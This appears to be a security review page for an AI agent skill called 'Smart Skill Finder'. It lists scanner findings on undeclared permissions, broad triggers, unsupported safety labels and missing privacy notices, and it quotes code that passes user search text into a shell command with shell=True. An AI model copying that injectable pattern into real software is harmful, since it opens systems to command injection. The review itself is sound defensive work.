ClawHub

Smart Skill Finder

Security checks across malware telemetry and agentic risk

Overview

This is a real skill-finding tool, but it should be reviewed because normal search text can be passed into a local shell command and some trust claims are overbroad.

Install only after review or patching. Use it only for explicit skill-search requests, do not rely on its security labels without checking the original registry or repository, and fix the Skills CLI call to use an argument list instead of shell=True before enabling it in a normal agent environment.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • Behavioral ASTexec() Call, eval() Call, Dynamic Import
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Findings (8)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
# Execute Skills CLI search
            cmd = f'npx skills find "{search_terms}" --json'
            result = subprocess.run(
                cmd, 
                shell=True, 
                capture_output=True,
Confidence
99% confidence
Finding
result = subprocess.run( cmd, shell=True, capture_output=True, text=True, timeout=10 )

Lp3

Medium
Category
MCP Least Privilege
Confidence
89% confidence
Finding
The skill documentation presents a benign recommendation tool, but the detected capabilities indicate it can use network and shell access without declaring those permissions. Undeclared execution and outbound connectivity reduce transparency and can expose users to command execution, data exfiltration, or unexpected external interactions during what appears to be a simple search workflow.

Tp4

High
Category
MCP Tool Poisoning
Confidence
94% confidence
Finding
This is a genuine description-behavior mismatch: the skill claims to only find and recommend skills, but also appears to invoke shell commands, access multiple external services, and use browser automation/scraping. That broader behavior materially increases risk because users and policy systems may grant trust based on the stated purpose while hidden capabilities enable unanticipated command execution and collection of remote content.

Context-Inappropriate Capability

Medium
Confidence
94% confidence
Finding
The examples claim specific third-party skills are 'Security verified' or 'Security scan pending' even though the skill's stated purpose is discovery and recommendation, not security assessment. This can mislead users into trusting and installing external code based on unsupported assurances, increasing supply-chain risk if a recommended skill is malicious or unsafe.

Context-Inappropriate Capability

High
Confidence
99% confidence
Finding
The Skills CLI integration gives user-controlled search text direct influence over a shell command, which expands the skill from simple discovery into command-execution capability. In an agent context, this is especially dangerous because user prompts may be attacker-controlled and the host environment may contain credentials, files, or network access.

Vague Triggers

Medium
Confidence
75% confidence
Finding
The README frames invocation as broad natural-language requests such as 'Simply ask natural language questions about what you need,' which can make the skill trigger on ambiguous prompts. In an agent environment, overly broad activation criteria can cause unintended tool use, unnecessary external lookups, or accidental disclosure of contextual data to search backends.

Missing User Warnings

Medium
Confidence
91% confidence
Finding
The README states that the skill reads existing skills, considers project context, references past conversations, and learns preferences over time, but it does not provide a privacy notice, consent model, or data-handling constraints. In a discovery skill, this increases the risk of over-collection or unintended use of sensitive workspace and memory data beyond what users expect for simple recommendations.

Vague Triggers

Medium
Confidence
87% confidence
Finding
The activation guidance is overly broad and matches common phrases such as 'How do I do X?' or 'Can you help me with X?', which can cause this skill to trigger for many unrelated requests. In context, that is risky because the skill has network/shell/search capabilities, so excessive invocation expands the chance of unintended external access or behavior outside the user's expectation.

VirusTotal

64/64 vendors flagged this skill as clean.

View on VirusTotal